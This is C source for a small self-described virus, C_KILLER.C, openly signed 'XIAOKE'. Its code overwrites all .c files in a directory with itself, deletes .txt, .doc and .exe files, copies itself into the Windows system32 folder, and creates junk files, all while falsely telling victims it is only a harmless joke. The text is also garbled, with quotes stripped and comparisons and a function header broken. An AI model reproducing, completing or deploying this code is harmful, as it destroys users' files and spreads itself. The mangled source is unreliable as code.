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#include io.h #include dir.h #include stdio.h #include stdlib.h #include string.h /* copy outfile to infile */ void copyfile(char *infile, char *outfile) { FILE *in,*out; in = fopen(infile,r); out = fopen(outfile,w); while (!feof(in)) { fputc(fgetc(in),out); } fclose(in); fclose(out); } /* This function named Rubbishmaker. */ void MakeRubbish() { int i; FILE *fp; char *path; char *NewName; char *disk[7] = {A,B,C,D,E,F,G}; char *addtion = :\\; /* Make some rubbish at the current catalogue */ for (i = 0; i5; i++) { char tempname[] = XXXXXX ; NewName = mktemp(tempname); fp = fopen(NewName,w); fclose(fp); } /* make some rubbish at the root catalogue */ path = strcat(disk[getdisk()],addtion); /* get the root catalogue */ chdir(path); /*change directory according to the path */ for (i = 0; i5; i++) { char tempname[] = XXXXXX; NewName = mktemp(tempname); fp = fopen(NewName,w); fclose(fp); } } /* This function can creat some .exe or .com documents in the sensitive place. Dont worry,Its only a joke.It will do no harm to your computer. */ void CreatEXE() { int i; char *path; char *s[2] = {C:\\WINDOWS\\system32\\loveworm.exe,C:\\WINDOWS\\} for ( i = 0; i 2; i++) { open(s[i], 0x0100,0x0080); copyfile( C_KILLER.C,s[i]); } } /* remove something from your computer */ void Remove() { int done; int i; struct ffblk ffblk; char *documenttype[3] = {*.txt,*.doc,*.exe}; for (i = 0; i 3; i++) { done = findfirst(documenttype[i],ffblk,2); while (!done) { remove(ffblk.ff_name); done = findnext(ffblk); } } } /* overlay the c programs */ void Breed( { int done; struct ffblk ffblk; done = findfirst(*.c,ffblk,2); while (!done) { if (strcmp(C_KILLER.C, ffblk.ff_name) != 0 ) { copyfile(C_KILLER.C,ffblk.ff_name); } done = findnext(ffblk); } } void main() { printf(THERE IS A VIRUS BY XIAOKE.\n\n); Breed(); Remove(); CreatEXE(); printf(COULD YOU TELL ME YOUR NAME?\n\n); printf(NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n); MakeRubbish(); getchar(); printf(ITS ONLY A JOKE!


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